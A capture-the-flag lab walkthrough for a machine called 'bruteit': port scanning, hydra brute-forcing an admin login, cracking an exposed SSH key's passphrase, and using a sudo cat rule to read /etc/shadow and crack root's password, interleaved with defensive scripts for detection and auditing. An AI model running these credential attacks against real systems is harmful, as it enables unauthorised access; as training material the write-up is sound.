Enumeration
Nmap
┌──(alen㉿kali)-[~/Downloads]
└─$ nmap -p- --min-rate 5000 10.10.110.235
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-11 22:26 +04
Nmap scan report for 10.10.110.235
Host is up (0.12s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds
┌──(alen㉿kali)-[~/Downloads]
└─$ nmap -A -p 22,80 10.10.110.235
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-11 22:26 +04
Nmap scan report for 10.10.110.235
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
| 256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_ 256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 118.61 ms 10.14.0.1
2 119.55 ms 10.10.110.235
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 15.77 seconds
The nmap scan shows two open ports, SSH (22) and HTTP (80). Let's take a look at the HTTP website first.

It's the default Apache page; I looked at the source code and found nothing of interest,
so let's perform content discovery using gobuster.
Gobuster
┌──(alen㉿kali)-[~/Downloads]
└─$ gobuster dir -u <http://10.10.110.235/> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: <http://10.10.110.235/>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 314] [--> <http://10.10.110.235/admin/>]
We found a directory called admin. Now let's look at the page.

We can see that it is a login page. Now let's look at the source code.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="styles.css">
<title>Admin Login Page</title>
</head>
<body>
<div class="main">
<form action="" method="POST">
<h1>LOGIN</h1>
<label>USERNAME</label>
<input type="text" name="user">
<label>PASSWORD</label>
<input type="password" name="pass">
<button type="submit">LOGIN</button>
</form>
</div>
<!-- Hey john, if you do not remember, the username is admin -->
</body>
</html>
Here we can see a comment saying that the username is admin, and the comment also gives us another potential username, john.
One more thing to notice is that the form is submitted as an HTTP POST, so we can use hydra to brute-force it.
Hydra
When using hydra a few details have to be collected first; they are marked in the screenshot below.

So user and pass are the input field names, the location of the page is /admin/ (make sure the path is correct: /admin without the trailing slash will not work, because the server answers it with a 301 redirect rather than the login page), and the error message on a failed login is "Username or password invalid".
Use all of this information to construct the hydra command.

┌──(alen㉿kali)-[~/Downloads]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.110.235 http-post-form "/admin/:user=^USER^&pass=^PASS^:F=Username or password invalid"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) starting at 2025-06-11 22:48:24
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.110.235:80/admin/:user=^USER^&pass=^PASS^:F=Username or password invalid
[80][http-post-form] host: 10.10.110.235 login: admin password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) finished at 2025-06-11 22:48:51
We have the password: xavier.
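A burst like the one hydra just produced (16 parallel tasks, thousands of POSTs to /admin/ in under 30 seconds, every failure answered with the same page) is easy to spot on the server side. The following script is an added example, not part of the original walkthrough: it parses Apache combined-log lines, flags any source IP that POSTs to the login path more than a threshold number of times inside a sliding window, and tallies the (status, size) pairs so the one response that differs from the repeated failure page stands out. The log lines and the 203.0.113.5 address are constructed for the example; the lab attacker's address is not on the page.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Apache combined-log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return ev


def find_bruteforce(lines, path="/admin/", threshold=10, window=timedelta(seconds=60)):
    """Flag source IPs that POST to `path` at least `threshold` times within any `window`.

    For each flagged IP the (status, size) pairs are counted too: a password-guessing
    tool's failures all come back with the same status and body size, so a single
    different pair inside the burst is the response an analyst should inspect first.
    """
    posts = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["path"] == path:
            posts[ev["ip"]].append(ev)

    alerts = {}
    for ip, events in posts.items():
        events.sort(key=lambda e: e["ts"])
        best, start = 0, 0
        for end in range(len(events)):  # sliding window over sorted timestamps
            while events[end]["ts"] - events[start]["ts"] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[ip] = {
                "attempts_in_window": best,
                "total": len(events),
                "responses": Counter((e["status"], e["size"]) for e in events),
            }
    return alerts


# Constructed sample log: one benign visitor plus a burst of 12 POSTs from a single
# source. 198.51.100.7 and 203.0.113.5 are documentation addresses, not lab hosts.
SAMPLE_LOG = (
    ['198.51.100.7 - - [11/Jun/2025:18:47:02 +0400] "GET /admin/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"']
    + [f'203.0.113.5 - - [11/Jun/2025:18:48:{30 + i:02d} +0400] "POST /admin/ HTTP/1.1" 200 1577 "-" "Mozilla/5.0 (Hydra)"'
       for i in range(11)]
    + ['203.0.113.5 - - [11/Jun/2025:18:48:41 +0400] "POST /admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Hydra)"']
)

if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

The threshold and window are deliberately generous; on a real site they should be tuned against normal login traffic, and the User-Agent is attacker-controlled, so the detection keys only on request rate and path. A web server that rate-limits or locks the account after a handful of failures would have stopped this attack long before rockyou.txt reached "xavier".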

After logging in we get a message telling john to finish the development of the website, and when we click on the link we can see an RSA private key file.

We can use wget to download the file, and then let's take a look at its permissions as well.
┌──(alen㉿kali)-[~/Downloads]
└─$ wget <http://10.10.110.235/admin/panel/id_rsa>
--2025-06-11 22:56:02-- <http://10.10.110.235/admin/panel/id_rsa>
Connecting to 10.10.110.235:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1766 (1.7K)
Saving to: ‘id_rsa’
id_rsa 100%[=============================================================================>] 1.72K --.-KB/s in 0s
2025-06-11 22:56:02 (110 MB/s) - ‘id_rsa’ saved [1766/1766]
┌──(alen㉿kali)-[~/Downloads]
└─$ ls -l | grep id_rsa
-rw-rw-r-- 1 alen alen 1766 Aug 17 2020 id_rsa
We can see that group and others can read the file, so we have to restrict the permissions using chmod; ssh refuses to use a private key file that is accessible to other users.
┌──(alen㉿kali)-[~/Downloads]
└─$ chmod 600 id_rsa
Now let's log in to SSH using the private key.
┌──(alen㉿kali)-[~/Downloads]
└─$ ssh john@10.10.110.235 -i id_rsa
The authenticity of host '10.10.110.235 (10.10.110.235)' can't be established.
ED25519 key fingerprint is SHA256:kuN3XXc+oPQAtiO0Gaw6lCV2oGx+hdAnqsj/7yfrGnM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.110.235' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Here we can see that ssh asks for a passphrase, which we don't have, so we have to crack it.
We can do that with ssh2john, one of the John the Ripper utilities, which converts the SSH private key into a hash format that john can then crack.
Using SSH2JOHN
┌──(alen㉿kali)-[~/Downloads]
└─$ ssh2john id_rsa > johnhash
┌──(alen㉿kali)-[~/Downloads]
└─$ john johnhash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockinroll (id_rsa)
1g 0:00:00:00 DONE (2025-06-11 23:08) 5.555g/s 403377p/s 403377c/s 403377C/s saloni..rock14
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We have the passphrase; now let's use it to get SSH access.
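Two things made this key cheap to crack: it sat on a web server with permissions 0664, and john's output ("KDF/cipher ... 0=MD5/AES", "iteration count 1") shows it is a legacy PEM key whose passphrase is stretched with a single MD5 pass, which is why the wordlist ran at roughly 400,000 candidates per second. The script below is an added example, not part of the original walkthrough: it inspects a private key file without the passphrase, reports the format, cipher and KDF cost, rates the protection, and checks the file mode the way the chmod step above fixed it. Both sample keys are constructed (headers only, dummy key material); the ssh-keygen default of 16 bcrypt rounds is used as the "acceptable" bar.

```python
import base64
import os
import stat
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _read_string(buf, off):
    """Read one SSH wire-format string (uint32 length prefix) starting at `off`."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    off += 4
    return buf[off:off + n], off + n


def key_protection_report(pem_text):
    """Describe how a PEM-encoded private key is protected, without needing the passphrase."""
    lines = [l.strip() for l in pem_text.strip().splitlines() if l.strip()]
    if not lines or not lines[0].startswith("-----BEGIN"):
        raise ValueError("not a PEM-encoded private key")
    if "OPENSSH PRIVATE KEY" in lines[0]:
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "kdf_rounds": rounds}
    # Legacy PEM (BEGIN RSA/DSA/EC PRIVATE KEY): encryption is signalled by headers.
    encrypted = any(l.startswith("Proc-Type:") and "ENCRYPTED" in l for l in lines)
    dek = next((l.split(":", 1)[1].strip().split(",")[0]
                for l in lines if l.startswith("DEK-Info:")), None)
    # OpenSSL derives the key with a single MD5 pass (EVP_BytesToKey); that is the
    # "0=MD5/AES" cost and "iteration count 1" john printed for this key.
    return {"format": "legacy-pem", "encrypted": encrypted, "cipher": dek,
            "kdf": "md5" if encrypted else None, "kdf_rounds": 1 if encrypted else None}


def rate(report):
    """'unprotected' (no passphrase), 'weak' (cheap KDF) or 'acceptable'."""
    if not report["encrypted"]:
        return "unprotected"
    if report["format"] == "legacy-pem" or (report["kdf_rounds"] or 0) < 16:
        return "weak"  # 16 is ssh-keygen's default bcrypt round count
    return "acceptable"


def too_open(path):
    """True if group or others have any access bit set; ssh rejects such key files."""
    return stat.S_IMODE(os.stat(path).st_mode) & (stat.S_IRWXG | stat.S_IRWXO) != 0


def demo_permissions():
    """Scratch file with the mode seen in the walkthrough (0664), then fixed to 0600."""
    with tempfile.NamedTemporaryFile(delete=False) as f:
        path = f.name
    try:
        os.chmod(path, 0o664)
        before = too_open(path)
        os.chmod(path, 0o600)
        after = too_open(path)
    finally:
        os.unlink(path)
    return before, after


# Constructed samples: real headers, dummy key material.
SAMPLE_LEGACY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

Q09OU1RSVUNURUQgU0FNUExFLCBOT1QgQSBSRUFMIEtFWQ==
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(b):
    return struct.pack(">I", len(b)) + b


_blob = (OPENSSH_MAGIC + _ssh_string(b"aes256-ctr") + _ssh_string(b"bcrypt")
         + _ssh_string(_ssh_string(b"\x00" * 16) + struct.pack(">I", 16))  # salt + rounds
         + struct.pack(">I", 1))                                           # number of keys
SAMPLE_OPENSSH = ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
                  + base64.b64encode(_blob).decode()
                  + "\n-----END OPENSSH PRIVATE KEY-----\n")

if __name__ == "__main__":
    for name, pem in (("legacy", SAMPLE_LEGACY), ("openssh", SAMPLE_OPENSSH)):
        r = key_protection_report(pem)
        print(name, rate(r), r)
    print("permissions too open before/after chmod 600:", demo_permissions())
```

The fix on the defending side is to generate keys in the openssh-key-v1 format with a high round count (`ssh-keygen -o -a 100`), keep them out of web roots entirely, and treat any key that turns up in a directory listing as compromised regardless of its passphrase.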
Shell as john
┌──(alen㉿kali)-[~/Downloads]
└─$ ssh john@10.10.110.235 -i id_rsa
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)
* Documentation: <https://help.ubuntu.com>
* Management: <https://landscape.canonical.com>
* Support: <https://ubuntu.com/advantage>
System information as of Wed Jun 11 17:02:31 UTC 2025
System load: 0.0 Processes: 108
Usage of /: 25.7% of 19.56GB Users logged in: 0
Memory usage: 25% IP address for ens5: 10.10.110.235
Swap usage: 0%
63 packages can be updated.
0 updates are security updates.
Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt
Now let's check for sudo misconfigurations using the sudo -l command.

We have found that we can run cat as root using sudo,
so let's read the shadow file.

Now let's copy the root user's hash and crack it using john.
┌──(alen㉿kali)-[~/Downloads]
└─$ nano roothash
┌──(alen㉿kali)-[~/Downloads]
└─$ john roothash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football (?)
1g 0:00:00:00 DONE (2025-06-11 23:20) 3.125g/s 1600p/s 1600c/s 1600C/s 123456..letmein
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
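The root compromise here rests on two findings an administrator could have caught in advance: a sudoers rule that lets an unprivileged user run a file-reading program as root, and a root password hash that is both a dictionary word and stretched with only the default 5000 sha512crypt rounds (john's "Cost 1 (iteration count) is 5000"). The audit below is an added example, not part of the original walkthrough: it parses sudoers-style rules and flags file readers or ALL granted to non-root users, and it parses /etc/shadow entries to report the algorithm and round count. The sudoers line for john is assumed (the exact rule is not shown on the page), and the shadow lines are constructed with placeholder hash strings.

```python
import os
import re

# Programs that read arbitrary files; running any of them as root exposes /etc/shadow,
# which is exactly what "sudo cat" was used for above.
FILE_READERS = {"cat", "tac", "less", "more", "head", "tail", "awk", "sed"}

RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudoers(text):
    """Flag sudoers rules that grant a file-reading program, or ALL, to a non-root user."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m or m.group("who") == "root":
            continue
        tags = m.group("tags") or ""
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            prog = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                reason = "unrestricted command set"
            elif prog in FILE_READERS:
                reason = f"{prog} can read any file as {m.group('runas') or 'root'}"
            else:
                continue
            findings.append({"user": m.group("who"), "command": cmd,
                             "nopasswd": "NOPASSWD" in tags, "reason": reason})
    return findings


CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
             "y": "yescrypt", "2b": "bcrypt"}


def shadow_hash_info(shadow_line):
    """Report the algorithm and iteration count of one /etc/shadow entry."""
    user, field = shadow_line.split(":")[:2]
    if field == "*" or field.startswith("!"):
        return {"user": user, "locked": True, "algorithm": None, "rounds": None}
    if field == "":
        return {"user": user, "locked": False, "algorithm": "none", "rounds": None}
    parts = field.split("$")  # ['', id, [rounds=N,] salt, hash]
    ident = parts[1]
    rounds = None
    if ident in ("5", "6"):
        rounds = 5000  # glibc default when no rounds= parameter is present
        if parts[2].startswith("rounds="):
            rounds = int(parts[2][len("rounds="):])
    return {"user": user, "locked": False,
            "algorithm": CRYPT_IDS.get(ident, "unknown"), "rounds": rounds}


# Constructed sudoers: the john rule is an assumption about the lab, not copied from it.
SAMPLE_SUDOERS = """Defaults env_reset
root ALL=(ALL:ALL) ALL
john ALL=(root) NOPASSWD: /bin/cat
alice ALL=(root) /usr/bin/systemctl restart nginx
"""

# Constructed shadow lines; the hash strings are placeholders, not real digests.
SAMPLE_SHADOW = [
    "root:$6$aBcDeFgH$PLACEHOLDERHASHNOTREALxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:18535:0:99999:7:::",
    "svc:$6$rounds=100000$aBcDeFgH$PLACEHOLDERHASHNOTREAL:18535:0:99999:7:::",
    "www-data:*:18535:0:99999:7:::",
]

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print("sudoers:", f)
    for line in SAMPLE_SHADOW:
        print("shadow:", shadow_hash_info(line))
```

A rule such as `john ALL=(root) NOPASSWD: /bin/cat` is the kind of finding this audit is meant to surface; the remediation is to remove it or scope it to the specific file john needs, and to raise the hashing cost (a `rounds=` parameter or yescrypt on newer distributions) so that a leaked shadow file cannot be run through a wordlist at 1600 candidates per second.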
Now that we have the root password, let's switch user to root.
Shell as root
john@bruteit:~$ su root
Password:
root@bruteit:/home/john# cd
root@bruteit:~# ls
root.txt
root@bruteit:~# cat root.txt
